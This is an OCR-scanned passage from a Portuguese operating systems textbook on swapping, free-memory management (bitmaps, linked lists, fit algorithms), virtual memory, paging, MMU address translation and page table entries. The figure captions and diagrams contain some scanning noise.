dos em disco em sua maior parte, portanto não ocupam 
qualquer memória quando não estão sendo executados 


(embora alguns “despertem” periodicamente para fazer 
seu trabalho, e então voltam a “dormir”). A outra es- 
tratégia, chamada de memória virtual, permite que os 
programas possam ser executados mesmo quando estão 
apenas parcialmente na memória principal. A seguir es- 
tudaremos a troca de processos; na Seção 3.3 examina- 
remos a memória virtual. 

A operação de um sistema de troca de processos 
está ilustrada na Figura 3.4. De início, somente o pro- 
cesso A está na memória. Então os processos B e C 
são criados ou trazidos do disco. Na Figura 3.4(d) o 
processo 4 é devolvido ao disco. Então o processo D 
é inserido e o processo B tirado. Por fim, o processo 
A volta novamente. Como A está agora em uma posi- 
ção diferente, os endereços contidos nele devem ser 
realocados, seja pelo software quando ele é trazido ou 
(mais provável) pelo hardware durante a execução do 
programa. Por exemplo, registradores base e limite 
funcionariam bem aqui. 

Quando as trocas de processos criam múltiplos espa- 
ços na memória, é possível combiná-los em um grande 
espaço movendo todos os processos para baixo, o máxi- 
mo possível. Essa técnica é conhecida como compacta- 
ção de memória. Em geral ela não é feita porque exige 
muito tempo da CPU. Por exemplo, em uma máquina 
de 16 GB que pode copiar 8 bytes em 8 ns, ela levaria 
em torno de 16 s para compactar toda a memória. 

Um ponto que vale a pena considerar diz respeito 
a quanta memória deve ser alocada para um processo 
quando ele é criado ou trocado. Se os processos são 
criados com um tamanho fixo que nunca muda, en- 
tão a alocação é simples: o sistema operacional aloca 
exatamente o que é necessário, nem mais nem menos. 

Se, no entanto, os segmentos de dados dos proces- 
sos podem crescer, alocando dinamicamente memória 


HeH TEZI Mudanças na alocação de memoria à medida que processos entram nela e saem dela. As regiões sombreadas são regiões 


não utilizadas da memória. 
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de uma área temporária, como em muitas linguagens 
de programação, um problema ocorre sempre que um 
processo tenta crescer. Se houver um espaço adjacente 
ao processo, ele poderá ser alocado e o processo será 
autorizado a crescer naquele espaço. Por outro lado, 
se o processo for adjacente a outro, aquele que cresce 
terá de ser movido para um espaço na memória grande 
o suficiente para ele, ou um ou mais processos terão de 
ser trocados para criar um espaço grande o suficiente. 
Se um processo não puder crescer em memória e a área 
de troca no disco estiver cheia, ele terá de ser suspenso 
até que algum espaço seja liberado (ou ele pode ser 
morto). 

Se o esperado for que a maioria dos processos cresça 
à medida que são executados, provavelmente seja uma 
boa ideia alocar um pouco de memória extra sempre 
que um processo for trocado ou movido, para reduzir a 
sobrecarga associada com a troca e movimentação dos 
processos que não cabem mais em sua memória alo- 
cada. No entanto, ao transferir processos para o disco, 
apenas a memória realmente em uso deve ser transferi- 
da; é um desperdício levar a memória extra também. Na 
Figura 3.5(a) vemos uma configuração de memória na 
qual o espaço para o crescimento foi alocado para dois 
processos. 

Se os processos podem ter dois segmentos em ex- 
pansão — por exemplo, os segmentos de dados usados 
como uma área temporária para variáveis que são di- 
namicamente alocadas e liberadas e uma área de pilha 
para as variáveis locais normais e endereços de retorno 
— uma solução alternativa se apresenta, a saber, aquela 
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da Figura 3.5(b). Nessa figura vemos que cada processo 
ilustrado tem uma pilha no topo da sua memoria alo- 
cada, que cresce para baixo, e um segmento de dados 
logo além do programa de texto, que cresce para cima. 
A memoria entre eles pode ser usada por qualquer seg- 
mento. Se ela acabar, o processo poderá ser transferido 
para outra área com espaço suficiente, ser transferido 
para o disco até que um espaço de tamanho suficiente 
possa ser criado, ou ser morto. 


3.2.3 Gerenciando a memória livre 


Quando a memória é designada dinamicamente, o 
sistema operacional deve gerenciá-la. Em termos ge- 
rais, há duas maneiras de se rastrear o uso de memória: 
mapas de bits e listas livres. Nesta seção e na próxima, 
examinaremos esses dois métodos. No Capítulo 10, es- 
tudaremos alguns alocadores de memória específicos 
no Linux [como os alocadores companheiros e de fatias 
(slab)] com mais detalhes. 


Gerenciamento de memória com mapas de bits 


Com um mapa de bits, a memória é dividida em uni- 
dades de alocação tão pequenas quanto umas poucas 
palavras e tão grandes quanto vários quilobytes. Cor- 
respondendo a cada unidade de alocação há um bit no 
mapa de bits, que é O se a unidade estiver livre e 1 se 
ela estiver ocupada (ou vice-versa). A Figura 3.6 mostra 
parte da memória e o mapa de bits correspondente. 


(cj (a) Alocação de espaço para um segmento de dados em expansão. (b) Alocação de espaço para uma pilha e um 


segmento de dados em expansão. 
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[FIGURA 3.6] (a) Uma parte da memória com cinco processos e três espaços. As marcas indicam as unidades de alocação de memória. As 
regiões sombreadas (0 no mapa de bits) estão livres. (b) Mapa de bits correspondente. (c) A mesma informação como lista. 
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O tamanho da unidade de alocação é uma importante 
questão de projeto. Quanto menor a unidade de aloca- 
ção, maior o mapa de bits. No entanto, mesmo com uma 
unidade de alocação tão pequena quanto 4 bytes, 32 bits 
de memória exigirão apenas 1 bit do mapa. Uma memó- 
ria de 32n bits usará um mapa de n bits, então o mapa de 
bits ocupará apenas 1/32 da memória. Se a unidade de 
alocação for definida como grande, o mapa de bits será 
menor, mas uma quantidade considerável de memória 
será desperdiçada na última unidade do processo se o 
tamanho dele não for um múltiplo exato da unidade de 
alocação. 

Um mapa de bits proporciona uma maneira simples 
de controlar as palavras na memória em uma quanti- 
dade fixa dela, porque seu tamanho depende somente 
dos tamanhos da memória e da unidade de alocação. 
O principal problema é que, quando fica decidido car- 
regar um processo com tamanho de k unidades, o ge- 
renciador de memória deve procurar o mapa de bits 
para encontrar uma sequência de k bits O consecutivos. 
Procurar em um mapa de bits por uma sequência de 
um comprimento determinado é uma operação lenta 
(pois a sequência pode ultrapassar limites de palavras 
no mapa); este é um argumento contrário aos mapas 
de bits. 


Gerenciamento de memória com listas encadeadas 


Outra maneira de controlar o uso da memória é man- 
ter uma lista encadeada de espaços livres e de segmen- 
tos de memória alocados, onde um segmento contém 
um processo ou é um espaço vazio entre dois processos. 
A memória da Figura 3.6(a) é representada na Figura 
3.6(c) como uma lista encadeada de segmentos. Cada 
entrada na lista especifica se é um espaço livre (L) ou 
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alocado a um processo (P), o endereço no qual se ini- 
cia esse segmento, o comprimento e um ponteiro para o 
item seguinte. 

Nesse exemplo, a lista de segmentos é mantida orde- 
nada pelos endereços. Essa ordenação tem a vantagem 
de que, quando um processo é terminado ou transferido, 
atualizar a lista é algo simples de se fazer. Um processo 
que termina a sua execução tem dois vizinhos (exceto 
quando espaços no início ou no fim da memória). Eles 
podem ser tanto processos quanto espaços livres, levan- 
do às quatro combinações mostradas na Figura 3.7. Na 
Figura 3.7(a) a atualização da lista exige substituir um P 
por um L. Nas figuras 3.7(b) e 3.7(c), duas entradas são 
fundidas em uma, e a lista fica uma entrada mais curta. 
Na Figura 3.7(d), três entradas são fundidas e dois itens 
são removidos da lista. 

Como a vaga da tabela de processos para o que está 
sendo concluído geralmente aponta para a entrada da 
lista do próprio processo, talvez seja mais convenien- 
te ter a lista como uma lista duplamente encadeada, 
em vez daquela com encadeamento simples da Figura 
3.6(c). Essa estrutura torna mais fácil encontrar a entra- 
da anterior e ver se a fusão é possível. 


leis SMA Quatro combinações de vizinhos para o processo 
que termina, X. 


Antes de X terminar Após X terminar 
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Quando processos e espaços livres são mantidos em 
uma lista ordenada por endereço, vários algoritmos po- 
dem ser usados para alocar memória para um processo 
criado (ou um existente em disco sendo transferido para 
a memória). Presumimos que o gerenciador de memória 
sabe quanta memória alocar. O algoritmo mais simples 
é first fit (primeiro encaixe). O gerenciador de memória 
examina a lista de segmentos até encontrar um espaço 
livre que seja grande o suficiente. O espaço livre é então 
dividido em duas partes, uma para o processo e outra 
para a memória não utilizada, exceto no caso estatisti- 
camente improvável de um encaixe exato. First fit é um 
algoritmo rápido, pois ele procura fazer a menor busca 
possível. 

Uma pequena variação do first fit é o next fit. Ele 
funciona da mesma maneira que o first fit, exceto por 
memorizar a posição que se encontra um espaço livre 
adequado sempre que o encontra. Da vez seguinte que 
for chamado para encontrar um espaço livre, ele co- 
meça procurando na lista do ponto onde havia parado, 
em vez de sempre do princípio, como faz o first fit. 
Simulações realizadas por Bays (1977) mostram que o 
next fit tem um desempenho ligeiramente pior do que 
o do first fit. 

Outro algoritmo bem conhecido e amplamente usa- 
do é o best fit. O best fit faz uma busca em toda a lista, 
do início ao fim, e escolhe o menor espaço livre que 
seja adequado. Em vez de escolher um espaço livre 
grande demais que talvez seja necessário mais tarde, 
o best fit tenta encontrar um que seja de um tamanho 
próximo do tamanho real necessário, para casar da me- 
lhor maneira possível a solicitação com os segmentos 
disponíveis. 

Como um exemplo do first fit e best fit, considere a 
Figura 3.6 novamente. Se um bloco de tamanho 2 for 
necessário, first fit alocará o espaço livre em 5, mas o 
best fit o alocará em 18. 

O best fit é mais lento do que o first fit, pois ele tem 
de procurar na lista inteira toda vez que é chamado. De 
uma maneira um tanto surpreendente, ele também resul- 
ta em um desperdício maior de memória do que o first 
fit ou next fit, pois tende a preencher a memória com 
segmentos minúsculos e inúteis. O first fit gera espaços 
livres maiores em média. 

Para contornar o problema de quebrar um espaço 
livre em um processo e um trecho livre minúsculo, a 
solução poderia ser o worst fit, isto é, sempre escolher 
o maior espaço livre, de maneira que o novo segmento 
livre gerado seja grande o bastante para ser útil. No 
entanto, simulações demonstraram que o worst fit tam- 
pouco é uma grande ideia. 
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Todos os quatro algoritmos podem ser acelerados 
mantendo-se listas em separado para os processos e os 
espaços livres. Dessa maneira, todos eles devotam toda 
a sua energia para inspecionar espaços livres, não pro- 
cessos. O preço inevitável que é pago por essa acelera- 
ção na alocação é a complexidade e lentidão adicionais 
ao remover a memória, já que um segmento liberado 
precisa ser removido da lista de processos e inserido na 
lista de espaços livres. 

Se listas distintas são mantidas para processos e 
espaços livres, a lista de espaços livres deve ser man- 
tida ordenada por tamanho, a fim de tornar o best fit 
mais rápido. Quando o best fit procura em uma lis- 
ta de segmentos de memória livre do menor para o 
maior, tão logo encontra um que se encaixe, ele sabe 
que esse segmento é o menor que funcionará, daí o 
nome. Não são necessárias mais buscas, como ocorre 
com o esquema de uma lista única. Com uma lista 
de espaços livres ordenada por tamanho, o first fit 
e o best fit são igualmente rápidos, e o next fit sem 
sentido. 

Quando os espaços livres são mantidos em listas se- 
paradas dos processos, uma pequena otimização é pos- 
sível. Em vez de ter um conjunto separado de estruturas 
de dados para manter a lista de espaços livres, como 
mostrado na Figura 3.6(c), a informação pode ser arma- 
zenada nos espaços livres. A primeira palavra de cada 
espaço livre pode ser seu tamanho e a segunda palavra 
um ponteiro para a entrada a seguir. Os nós da lista da 
Figura 3.6(c), que exigem três palavras e um bit (P/L), 
não são mais necessários. 

Outro algoritmo de alocação é o quick fit, que man- 
tém listas em separado para alguns dos tamanhos mais 
comuns solicitados. Por exemplo, ele pode ter uma ta- 
bela com n entradas, na qual a primeira é um ponteiro 
para o início de uma lista espaços livres de 4 KB, a se- 
gunda é um ponteiro para uma lista de espaços livres de 
8 KB, a terceira de 12 KB e assim por diante. Espaços 
livres de, digamos, 21 KB, poderiam ser colocados na 
lista de 20 KB ou em uma lista de espaços livres de 
tamanhos especiais. 

Com o quick fit, encontrar um espaço livre do ta- 
manho exigido é algo extremamente rápido, mas tem 
as mesmas desvantagens de todos os esquemas que or- 
denam por tamanho do espaço livre, a saber, quando 
um processo termina sua execução ou é transferido da 
memória, descobrir seus vizinhos para ver se uma fu- 
são com eles é possível é algo bastante caro. Se a fusão 
não for feita, a memória logo se fragmentará em um 
grande número de pequenos segmentos livres nos quais 
nenhum processo se encaixara. 
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3.3 Memoria virtual 


Embora os registradores base e os registradores limi- 
te possam ser usados para criar a abstração de espaços 
de endereçamento, há outro problema que precisa ser 
solucionado: gerenciar o bloatware.' Apesar de os tama- 
nhos das memórias aumentarem depressa, os tamanhos 
dos softwares estão crescendo muito mais rapidamente. 
Nos anos 1980, muitas universidades executavam um 
sistema de compartilhamento de tempo com dúzias de 
usuários (mais ou menos satisfeitos) executando simul- 
taneamente em um VAX de 4 MB. Agora a Microsoft 
recomenda no mínimo 2 GB para o Windows 8 de 64 
bits. A tendência à multimídia coloca ainda mais de- 
mandas sobre a memória. 

Como consequência desses desenvolvimentos, há 
uma necessidade de executar programas que são gran- 
des demais para se encaixar na memória e há certamente 
uma necessidade de ter sistemas que possam dar suporte 
a múltiplos programas executando em simultâneo, cada 
um deles encaixando-se na memória, mas com todos 
coletivamente excedendo-a. A troca de processos não é 
uma opção atraente, visto que o disco SATA típico tem 
um pico de taxa de transferência de várias centenas de 
MB/s, o que significa que demora segundos para retirar 
um programa de 1 GB e o mesmo para carregar um pro- 
grama de 1 GB. 

O problema dos programas maiores do que a me- 
mória existe desde o inicio da computação, embora em 
áreas limitadas, como a ciência e a engenharia (simu- 
lar a criação do universo, ou mesmo um avião novo, 
exige muita memória). Uma solução adotada nos anos 
1960 foi dividir os programas em módulos pequenos, 
chamados de sobreposições. Quando um programa ini- 
cializava, tudo o que era carregado na memória era o 
gerenciador de sobreposições, que imediatamente car- 
regava e executava a sobreposição 0. Quando termi- 
nava, ele dizia ao gerenciador de sobreposições para 
carregar a sobreposição 1, acima da sobreposição 0 na 
memória (se houvesse espaço para isso), ou em cima 
da sobreposição O (se não houvesse). Alguns sistemas 
de sobreposições eram altamente complexos, permitin- 
do muitas sobreposições na memória ao mesmo tempo. 
As sobreposições eram mantidas no disco e transferidas 
para dentro ou para fora da memória pelo gerenciador 
de sobreposições. 





Embora o trabalho real de troca de sobreposições do 
disco para a memória e vice-versa fosse feito pelo siste- 
ma operacional, o trabalho da divisão do programa em 
módulos tinha de ser feito manualmente pelo programa- 
dor. Dividir programas grandes em módulos pequenos 
era uma tarefa cansativa, chata e propensa a erros. Pou- 
cos programadores eram bons nisso. Não levou muito 
tempo para alguém pensar em passar todo o trabalho 
para o computador. 

O método encontrado (FOTHERINGHAM, 1961) 
ficou conhecido como memória virtual. A ideia básica 
é que cada programa tem seu próprio espaço de endere- 
çamento, o qual é dividido em blocos chamados de pá- 
ginas. Cada página é uma série contígua de endereços. 
Elas são mapeadas na memória física, mas nem todas 
precisam estar na memória física ao mesmo tempo para 
executar o programa. Quando o programa referencia 
uma parte do espaço de endereçamento que está na me- 
mória física, o hardware realiza o mapeamento neces- 
sário rapidamente. Quando o programa referencia uma 
parte de seu espaço de endereçamento que não está na 
memória física, o sistema operacional é alertado para 
ir buscar a parte que falta e reexecuta a instrução que 
falhou. 

De certa maneira, a memória virtual é uma genera- 
lização da ideia do registrador base e registrador limite. 
O 8088 tinha registradores base separados (mas não re- 
gistradores limite) para texto e dados. Com a memória 
virtual, em vez de ter realocações separadas apenas para 
os segmentos de texto e dados, todo o espaço de ende- 
reçamento pode ser mapeado na memória física em uni- 
dades razoavelmente pequenas. Mostraremos a seguir 
como a memória virtual é implementada. 

A memória virtual funciona bem em um sistema 
de multiprogramação, com pedaços e partes de muitos 
programas na memória simultaneamente. Enquanto um 
programa está esperando que partes de si mesmo sejam 
lidas, a CPU pode ser dada para outro processo. 


3.3.1 Paginação 


A maioria dos sistemas de memória virtual usa uma 
técnica chamada de paginação, que descreveremos 
agora. Em qualquer computador, programas referen- 
ciam um conjunto de endereços de memória. Quando 
um programa executa uma instrução como 


1 Bloatware é o termo utilizado para definir softwares que usam quantidades excessivas de memória. (N. R. T.) 


MOV REG,1000 


ele o faz para copiar o conteúdo do endereço de me- 
mória 1000 para REG (ou vice-versa, dependendo do 
computador). Endereços podem ser gerados usando in- 
dexação, registradores base, registradores de segmento 
e outras maneiras. 

Esses endereços gerados por computadores são cha- 
mados de endereços virtuais e formam o espaço de 
endereçamento virtual. Em computadores sem memó- 
ria virtual, o endereço virtual é colocado diretamente no 
barramento de memória e faz que a palavra de memória 
física com o mesmo endereço seja lida ou escrita. Quan- 
do a memória virtual é usada, os endereços virtuais não 
vão diretamente para o barramento da memória. Em 
vez disso, eles vão para una MMU (Memory Mana- 
gement Unit — unidade de gerenciamento de memória) 
que mapeia os endereços virtuais em endereços de me- 
mória física, como ilustrado na Figura 3.8. 

Um exemplo muito simples de como esse mapea- 
mento funciona é mostrado na Figura 3.9. Nesse exem- 
plo, temos um computador que gera endereços de 16 
bits, de 0 a 64 K — 1. Esses são endereços virtuais. Esse 
computador, no entanto, tem apenas 32 KB de memória 
física. Então, embora programas de 64 KB possam ser 
escritos, eles não podem ser totalmente carregados na 
memória e executados. Uma cópia completa da imagem 
de núcleo de um programa, de até 64 KB, deve estar 
presente no disco, entretanto, de maneira que partes 
possam ser carregadas quando necessário. 

O espaço de endereçamento virtual consiste em 
unidades de tamanho fixo chamadas de páginas. As 
unidades correspondentes na memória física são cha- 
madas de quadros de página. As páginas e os qua- 
dros de página são geralmente do mesmo tamanho. 


A posição e função da MMU. Aqui a MMU é 
mostrada como parte do chip da CPU porque isso 
é comum hoje. No entanto, logicamente, poderia 
ser um chip separado, como era no passado. 


A CPU envia endereços 
virtuais à MMU 


Unidade de Memória Controlador 
gerenciamento de disco 
de memória 
(MMU) 


Processador 





Barramento 


A MMU envia endereços 
físicos à memória 
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Nesse exemplo, elas têm 4 KB, mas tamanhos de pá- 
gina de 512 bytes a um gigabyte foram usadas em sis- 
temas reais. Com 64 KB de espaço de endereçamento 
virtual e 32 KB de memória física, podemos ter 16 
páginas virtuais e 8 quadros de páginas. Transferên- 
cias entre a memória RAM e o disco são sempre em 
páginas inteiras. Muitos processadores dão suporte a 
múltiplos tamanhos de páginas que podem ser com- 
binados e casados como o sistema operacional pre- 
ferir. Por exemplo, a arquitetura x86-64 dá suporte 
a páginas de 4 KB, 2 MBe 1 GB, então poderíamos 
usar páginas de 4 KB para aplicações do usuário e 
uma única página de 1 GB para o núcleo. Veremos 
mais tarde por que às vezes é melhor usar uma única 
página maior do que um grande número de páginas 
pequenas. 

Anotação na Figura 3.9 é a seguinte: a série marcada 
OK-4K significa que os endereços virtuais ou físicos 
naquela página são 0 a 4095. A série 4K-8K refere-se 
aos endereços 4096 a 8191, e assim por diante. Cada 
página contém exatamente 4096 endereços começando 
com um múltiplo de 4096 e terminando antes de um 
múltiplo de 4096. 

Quando o programa tenta acessar o endereço 0, por 
exemplo, usando a instrução 


MOV REG,O 


o endereço virtual 0 é enviado para a MMU. A MMU 
detecta que esse endereço virtual situa-se na página 0 
(0 a 4095), que, de acordo com seu mapeamento, cor- 
responde ao quadro de página 2 (8192 a 12287). Ele 
então transforma o endereço para 8192 e envia o ende- 
reço 8192 para o barramento. A memória desconhece 
completamente a MMU e apenas vê uma solicitação 
para leitura ou escrita do endereço 8192, a qual ela exe- 
cuta. Desse modo, a MMU mapeou efetivamente todos 
os endereços virtuais de O a 4095 em endereços físicos 
localizados de 8192 a 12287. 
De modo similar, a instrução 


MOV REG,8192 
é efetivamente transformada em 
MOV REG,24576 


pois o endereço virtual 8192 (na página virtual 2) está 
mapeado em 24576 (no quadro de página física 6). 
Como um terceiro exemplo, o endereço virtual 20500 
está localizado a 20 bytes do início da página virtual 
5 (endereços virtuais 20480 a 24575) e é mapeado no 
endereço físico 12288 + 20 = 12308. 
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A relação entre endereços virtuais e endereços 

de memória física é dada pela tabela de páginas. 
Cada página começa com um múltiplo de 4096 e 
termina 4095 endereços acima; assim, 4K a 8K na 
verdade significa 4096-8191 e 8K a 12K significa 
8192-12287. 
Espaço 

de endereçamento 

virtual 





60K-64K 
56K—60K 
52K-56K 
48K-52K 
44K-48K 
40K-44K 
36K—40K 
32K-36K 
28K-32K 
24K-28K 
20K-24K 
16K-20K 
12K-16K 
8K-12K 8K-12K 

4K-8K 4K-8K 


| 
occa |” NO Tocas 


Quadro de página 


} Pagina virtual 


Endereço 
de memória 
física 
28K-32K 
24K-28K 
20K-24K 
16K-20K 
12K-16K 


Por si só, essa habilidade de mapear as 16 páginas 
virtuais em qualquer um dos oito quadros de páginas 
por meio da configuração adequada do mapa das MMU 
não soluciona o problema de que o espaço de endereça- 
mento virtual é maior do que a memória física. Como 
temos apenas oito quadros de páginas físicas, apenas 
oito das páginas virtuais na Figura 3.9 estão mapeadas 
na memória física. As outras, mostradas com um X na 
figura, não estão mapeadas. No hardware real, um bit 
Presente/ausente controla quais páginas estão fisica- 
mente presentes na memória. 

O que acontece se o programa referencia um endere- 
ço não mapeado, por exemplo, usando a instrução 


MOV REG,32780 


a qual é o byte 12 dentro da página virtual 8 (começan- 
do em 32768)? A MMU observa que a página não está 
mapeada (o que é indicado por um X na figura) e faz 
a CPU desviar para o sistema operacional. Essa inter- 
rupção é chamada de falta de página (page fault). O 
sistema operacional escolhe um quadro de página pou- 
co usado e escreve seu conteúdo de volta para o disco 
(se já não estiver ali). Ele então carrega (também do 


disco) a página recém-referenciada no quadro de página 
recém-liberado, muda o mapa e reinicia a instrução que 
causou a interrupção. 

Por exemplo, se o sistema operacional decidiu es- 
colher o quadro da página 1 para ser substituído, ele 
carregará a página virtual 8 no endereço físico 4096 e 
fará duas mudanças para o mapa da MMU. Primeiro, 
ele marcará a entrada da página 1 virtual como não ma- 
peada, a fim de impedir quaisquer acessos futuros aos 
endereços virtuais entre 4096 e 8191. Então substituirá 
o X na entrada da página virtual 8 com um 1, assim, 
quando a instrução causadora da interrupção for reexe- 
cutada, ele mapeará os endereços virtuais 32780 para os 
endereços físicos 4108 (4096 + 12). 

Agora vamos olhar dentro da MMU para ver 
como ela funciona e por que escolhemos usar um ta- 
manho de página que é uma potência de 2. Na Figura 
3.10 vimos um exemplo de um endereço virtual, 8196 
(0010000000000100 em binário), sendo mapeado usan- 
do o mapa da MMU da Figura 3.9. O endereço virtual 
de 16 bits que chega à MMU está dividido em um nú- 
mero de página de 4 bits e um deslocamento de 12 bits. 
Com 4 bits para o número da página, podemos ter 16 
páginas, e com 12 bits para o deslocamento, podemos 
endereçar todos os 4096 bytes dessa página. 

O número da página é usado como um índice para a 
tabela de páginas, resultando no número do quadro de 
página correspondente àquela página virtual. Se o bit 
Presente/ausente for 0, ocorrerá uma interrupção para o 
sistema operacional. Se o bit for 1, o número do quadro 
de página encontrado na tabela de páginas é copiado 
para os três bits mais significativos para o registrador 
de saída, junto com o deslocamento de 12 bits, que é 
copiado sem modificações do endereço virtual de entra- 
da. Juntos eles formam um endereço físico de 15 bits. O 
registrador de saída é então colocado no barramento de 
memória como o endereço de memória físico. 


3.3.2 Tabelas de páginas 


Em uma implementação simples, o mapeamento de 
endereços virtuais em endereços físicos pode ser resu- 
mido como a seguir: o endereço virtual é dividido em 
um número de página virtual (bits mais significativos) 
e um deslocamento (bits menos significativos). Por 
exemplo, com um endereço de 16 bits e um tamanho 
de página de 4 KB, os 4 bits superiores poderiam espe- 
cificar uma das 16 páginas virtuais e os 12 bits inferio- 
res especificariam então o deslocamento de bytes (0 a 
4095) dentro da página selecionada. No entanto, uma 
divisão com 3 ou 5 ou algum outro número de bits para 


a página também é possível. Divisões diferentes impli- 
cam tamanhos de páginas diferentes. 

O número da página virtual é usado como um índi- 
ce dentro da tabela de páginas para encontrar a entrada 
para essa página virtual. A partir da entrada da tabela de 
páginas, chega-se ao número do quadro (se ele existir). 
O número do quadro de página é colocado com os bits 
mais significativos do deslocamento, substituindo o nú- 
mero de página virtual, a fim de formar um endereço 
físico que pode ser enviado para a memória. 

Assim, o propósito da tabela de páginas é mapear as 
páginas virtuais em quadros de páginas. Matematica- 
mente falando, a tabela de páginas é uma função, com 
o número da página virtual como argumento e o núme- 
ro do quadro físico como resultado. Usando o resultado 
dessa função, o campo da página virtual em um endereço 
virtual pode ser substituído por um campo de quadro de 
página, desse modo formando um endereço de memória 
física. 

Neste capítulo, nós nos preocupamos somente com 
a memória virtual e não com a virtualização completa. 
Em outras palavras: nada de máquinas virtuais ainda. 
Veremos no Capítulo 7 que cada máquina virtual exi- 
ge sua própria memória virtual e, como resultado, a 


a (ejU IRL] A operação interna da MMU com 16 páginas de 4 KB. 
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organizacao da tabela de paginas torna-se muito mais 
complicada, envolvendo tabelas de paginas sombreadas 
ou aninhadas e mais. Mesmo sem tais configurações 
arcanas, a paginação e a memória virtual são bastante 
sofisticadas, como veremos. 


Estrutura de uma entrada da tabela de páginas 


Vamos passar então da análise da estrutura das tabelas 
de páginas como um todo para os detalhes de uma única 
entrada da tabela de páginas. O desenho exato de uma 
entrada na tabela de páginas é altamente dependente da 
máquina, mas o tipo de informação presente é mais ou 
menos o mesmo de máquina para máquina. Na Figura 
3.11 apresentamos uma amostra de entrada na tabela de 
páginas. O tamanho varia de computador para computa- 
dor, mas 32 bits é um tamanho comum. O campo mais 
importante é o Número do quadro de página. Afinal, a 
meta do mapeamento de páginas é localizar esse valor. 
Próximo a ele, temos o bit Presente/ausente. Se esse bit 
for 1, a entrada é válida e pode ser usada. Se ele for 0, 
a página virtual à qual a entrada pertence não está atu- 
almente na memória. Acessar uma entrada da tabela de 
páginas com esse bit em 0 causa uma falta de página. 
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lei) wb) Uma entrada típica de uma tabela de páginas. 


Cache 


desabilitado Modificada Presente/ausente 





MU = O ese 


Referenciada Proteção 


Os bits Proteção dizem quais tipos de acesso são 
permitidos. Na forma mais simples, esse campo contém 
1 bit, com 0 para ler/escrever e 1 para ler somente. Um 
arranjo mais sofisticado é ter 3 bits, para habilitar a lei- 
tura, escrita e execução da página. 

Os bits Modificada e Referenciada controlam o uso 
da página. Ao escrever na página, o hardware automa- 
ticamente configura o bit Modificada. Esse bit é impor- 
tante quando o sistema operacional decide recuperar um 
quadro de página. Se a página dentro do quadro foi mo- 
dificada (isto é, está “suja”), ela também deve ser atua- 
lizada no disco. Se ela não foi modificada (isto é, está 
“limpa”, ela pode ser abandonada, tendo em vista que a 
cópia em disco ainda é válida. O bit às vezes é chamado 
de bit sujo, já que ele reflete o estado da página. 

O bit Referenciada é configurado sempre que uma 
página é referenciada, seja para leitura ou para escrita. 
Seu valor é usado para ajudar o sistema operacional a 
escolher uma página a ser substituída quando uma falta 
de página ocorrer. Páginas que não estão sendo usadas 
são candidatas muito melhores do que as páginas que 
estão sendo, e esse bit desempenha um papel importante 
em vários dos algoritmos de substituição de páginas que 
estudaremos posteriormente neste capítulo. 

Por fim, o último bit permite que o mecanismo de 
cache seja desabilitado para a página. Essa propriedade 
é importante para páginas que mapeiam em registrado- 
res de dispositivos em vez da memória. Se o sistema 
operacional está parado em um laço estreito esperando 
que algum dispositivo de E/S responda a um comando 
que lhe foi dado, é fundamental que o hardware conti- 
nue buscando a palavra do dispositivo, e não use uma 
cópia antiga da cache. Com esse bit, o mecanismo da 
cache pode ser desabilitado. Máquinas com espaços 
para E/S separados e que não usam E/S mapeada em 
memória não precisam desse bit. 

Observe que o endereço de disco usado para arma- 
zenar a página quando ela não está na memória não 
faz parte da tabela de páginas. A razão é simples. A ta- 
bela de páginas armazena apenas aquelas informações 
de que o hardware precisa para traduzir um endereço 


virtual para um endereço físico. As informações que 
o sistema operacional precisa para lidar com faltas de 
páginas são mantidas em tabelas de software dentro 
do sistema operacional. O hardware não precisa dessas 
informações. 

Antes de entrarmos em mais questões de implemen- 
tação, vale a pena apontar de novo que o que a memória 
virtual faz em essência é criar uma nova abstração — o 
espaço de endereçamento — que é uma abstração da 
memória física, da mesma maneira que um processo é 
uma abstração do processador físico (CPU). A memó- 
ria virtual pode ser implementada dividindo o espaço 
do endereço virtual em páginas e mapeando cada uma 
delas em algum quadro de página da memória física ou 
não as mapeando (temporariamente). Desse modo, ela 
diz respeito basicamente à abstração criada pelo sistema 
operacional e como essa abstração é gerenciada. 


3.3.3 Acelerando a paginação 


Acabamos de ver os princípios básicos da memória 
virtual e da paginação. É chegado o momento agora de 
entrar em maiores detalhes a respeito de possíveis im- 
plementações. Em qualquer sistema de paginação, duas 
questões fundamentais precisam ser abordadas: 


1. O mapeamento do endereço virtual para o ende- 
reço físico precisa ser rápido. 

2. Se o espaço do endereço virtual for grande, a ta- 
bela de páginas será grande. 


O primeiro ponto é uma consequência do fato de que 
o mapeamento virtual-físico precisa ser feito em cada 
referência de memória. Todas as instruções devem em 
última análise vir da memória e muitas delas referen- 
ciam operandos na memória também. Em consequên- 
cia, é preciso que se faça uma, duas, ou às vezes mais 
referências à tabela de páginas por instrução. Se a exe- 
cução de uma instrução leva, digamos, 1 ns, a procura 
na tabela de páginas precisa ser feita em menos de 0,2 
ns para evitar que o mapeamento se torne um gargalo 
significativo. 


O segundo ponto decorre do fato de que todos os 
computadores modernos usam endereços virtuais de 
pelo menos 32 bits, com 64 bits tornando-se a norma 
para computadores de mesa e laptops. Com um tama- 
nho de página, digamos, de 4 KB, um espaço de ende- 
reço de 32 bits tem 1 milhão de páginas e um espaço 
de endereço de 64 bits tem mais do que você gostaria 
de contemplar. Com 1 milhão de páginas no espaço de 
endereço virtual, a tabela de página precisa ter 1 milhão 
de entradas. E lembre-se de que cada processo precisa 
da sua própria tabela de páginas (porque ele tem seu 
próprio espaço de endereço virtual). 

A necessidade de mapeamentos extensos e rápidos 
é uma limitação muito significativa sobre como os 
computadores são construídos. O projeto mais sim- 
ples (pelo menos conceitualmente) é ter uma única 
tabela de página consistindo de uma série de regis- 
tradores de hardware rápidos, com uma entrada para 
cada página virtual, indexada pelo número da pági- 
na virtual, como mostrado na Figura 3.10. Quando 
um processo é inicializado, o sistema operacional 
carrega os registradores com a tabela de páginas do 
processo, tirada de uma cópia mantida na memória 
principal. Durante a execução do processo, não são 
necessárias mais referências de memória para a tabe- 
la de páginas. As vantagens desse método são que ele 
é direto e não exige referências de memória durante o 
mapeamento. Uma desvantagem é que ele é terrivel- 
mente caro se a tabela de páginas for grande; ele sim- 
plesmente não é prático na maioria das vezes. Outra 
desvantagem é que ter de carregar a tabela de páginas 
inteira em cada troca de contexto mataria completa- 
mente o desempenho. 

No outro extremo, a tabela de página pode estar in- 
teiramente na memória principal. Tudo o que o hardware 
precisa então é de um único registrador que aponte para 
o início da tabela de páginas. Esse projeto permite que 
o mapa virtual-físico seja modificado em uma troca de 
contexto através do carregamento de um registrador. É 
claro, ele tem a desvantagem de exigir uma ou mais re- 
ferências de memória para ler as entradas na tabela de 
